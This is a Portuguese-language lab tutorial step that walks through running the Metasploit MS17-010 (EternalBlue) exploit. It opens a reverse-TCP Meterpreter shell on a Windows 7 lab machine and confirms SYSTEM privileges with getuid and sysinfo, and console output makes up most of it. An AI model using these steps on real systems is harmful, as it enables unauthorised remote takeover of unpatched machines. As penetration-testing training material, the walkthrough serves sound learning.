Executar o exploit e estabelecer uma sessão Meterpreter
Nesta etapa, com todas as opções configuradas, você lançará o exploit e assumirá o controle da máquina alvo.
Toda a preparação está feita. O exploit está selecionado, o alvo está definido e o payload foi escolhido. Para lançar o ataque, simplesmente use o comando exploit.
exploit
O Metasploit tentará explorar a vulnerabilidade no alvo. Você verá várias mensagens de status enquanto ele trabalha. Se for bem-sucedido, o exploit entregará o payload Meterpreter, e você verá uma mensagem indicando "WIN!" e que uma nova sessão foi aberta.
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
O prompt meterpreter > significa sucesso! Agora você tem um shell remoto na máquina da vítima. Para provar seu controle, execute o comando getuid para ver com qual conta de usuário você está executando.
getuid
A saída deve ser:
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM é o nível mais alto de privilégio em um sistema Windows. Você comprometeu com sucesso o alvo. Você também pode executar sysinfo para obter informações do sistema.
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
Parabéns, você explorou com sucesso o MS17-010.